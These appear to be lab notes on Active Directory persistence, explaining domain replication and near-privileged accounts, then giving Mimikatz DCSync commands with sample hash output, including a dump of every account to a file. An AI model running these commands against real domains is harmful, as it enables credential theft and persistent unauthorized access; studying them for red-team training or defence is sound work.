Credentials

Required Privileges: Administrators - Replicating Directory Changes

Domains are often used in multiple regional locations, and having a single Domain Controller would significantly delay any Authentication services in AD. As such, these Organizations make use of multiple DC's, so it is possible to Authenticate with the same Credentials in two different Locations (This Process is Called Domain Replication).

Each Domain Controller runs a process called the Knowledge Consistency Checker (KCC). The KCC generates a replication topology for the AD Forest and automatically connects to other Domain Controllers through Remote Procedure Calls (RPC) to Synchronize Information. This includes Updated Information such as the User new Password and new Objects such as when a new User is created.

A popular Attack to perform is a DC Sync Attack. If we have access to an Account that has Domain Replication Permissions, we can stage a DC Sync Attack to Harvest Credentials from a DC.

Not All Credentials Are Created Equal

Privileged Credentials

If we only have Privileged Credentials, it is safe to say as soon as the Blue Team discovers us, they will Rotate those Accounts, and we can potentially lose our Access.

• The goal then is to persist with Near-Privileged Credentials:
  • Credentials that have Local Administrator rights on Several Machines: Usually, organizations have Group's with Local Admin rights on almost all Computers. These Groups are typically divided into one for Workstations and one for Servers.
  • Service Accounts that have Delegation Permissions: With these accounts, we would be able to force Golden and Silver Tickets to perform Kerberos Delegation Attacks.
  • Accounts used for Privileged AD Services: If we compromise Accounts of Privileged Services such as Exchange, Windows Server Update Services (WSUS), or System Center Configuration Manager (SCCM), we could leverage AD Exploitation to once again gain a Privileged Foothold.

DCSync

We can use Mimikatz to Harvest these Credentials. [Domain Administrator Credentials are Required]

Mimikatz

:: Performing a DC Sync of a Single Account [Our own for Example]
lsadump::dcsync /domain:za.adobe.loc /user:<Low-Privilege AD Username>

Output

[DC] 'za.adobe.loc' Will be the Domain
[DC] 'PCDC.za.adobe.loc' Will be the DC Server 
[DC] '<Low-Privilege AD Username>' Will be the User Account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : <Low-Privilege AD Username> 

** SAM ACCOUNT **

SAM Username         : <Low-Privilege AD Username>
Account Type         : 30000000 ( USER_OBJECT )    
User Account Control : 00000200 ( NORMAL_ACCOUNT ) 
Account expiration   :
Password last change : 4/25/2022 7:30:21 PM
Object Security ID   : S-1-5-21-3885271727-2693558621-2658995185-1429 
Object Relative ID   : 1429

Credentials:
  Hash NTLM: fbdcd5041c96ddbd82224270b57f11fc 
    ntlm- 0: fbdcd5041c96ddbd82224270b57f11fc 
    lm  - 0: 0fd2685aa18c78bd265d02bdec203b04 

[...]

* Primary:WDigest * 
    01  991d45386dd3561e0c5529d3605f96e6
    02  d5d6f25b233c87b289706d7b423f1145
[...]

:: Performing a DC Sync of a Every Account 
:: Logging must be Enabled for this Task
log <Username>_dcdump.txt 

:: Instead of Specifying the Username the Flag [/all] us Used
:: This Output will go into a File in your Current Directory
lsadump::dcsync /domain:za.adobe.loc /all